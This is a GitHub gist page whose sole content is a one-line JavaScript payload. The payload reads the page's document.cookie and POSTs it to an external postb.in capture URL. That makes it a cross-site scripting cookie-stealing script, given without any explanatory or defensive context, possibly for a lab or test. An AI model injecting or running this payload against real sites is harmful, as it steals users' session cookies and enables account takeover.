Skip to content

Instantly share code, notes, and snippets.

@botagar
Created October 29, 2019 13:55
Show Gist options
  • Save botagar/ef9a13786c50000c790809ef694511c2 to your computer and use it in GitHub Desktop.
Save botagar/ef9a13786c50000c790809ef694511c2 to your computer and use it in GitHub Desktop.
var http=new XMLHttpRequest;var url='https://postb.in/1572355151312-4755549670662';http.open('POST',url,true);http.setRequestHeader('content-type','application/x-www-form-urlencoded');var data=new FormData;data.append('c',document.cookie);http.send(data);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment